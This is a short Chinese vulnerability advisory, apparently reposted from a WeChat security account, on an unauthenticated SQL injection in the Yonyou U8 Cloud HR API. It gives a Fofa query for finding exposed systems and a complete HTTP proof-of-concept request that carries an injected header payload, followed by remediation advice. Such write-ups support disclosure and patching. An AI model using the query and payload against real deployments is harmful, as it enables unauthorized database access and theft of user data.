免责声明:
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
漏洞概述
用友U8 Cloud HR系统的接口存在SQL注入漏洞,使得攻击者可以在无需授权的情况下访问数据库,并可能盗取用户数据,从而导致严重的用户信息泄露。
漏洞复现
Fofa
app=“用友-U8-Cloud”
Poc
GET /u8cloud/api/hr HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
system: -1' or 1=@@version--+
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
由于该漏洞可利用资产比较多,防止恶意利用,公众号回复
修复建议
1、请联系厂商进行修复。
2、如非必要,禁止公网访问该系统。
3、使用预编译处理SQL查询语句。
点个小赞你最好看
原文始发于微信公众号(影域实验室):用友U8 Cloud hr SQL注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论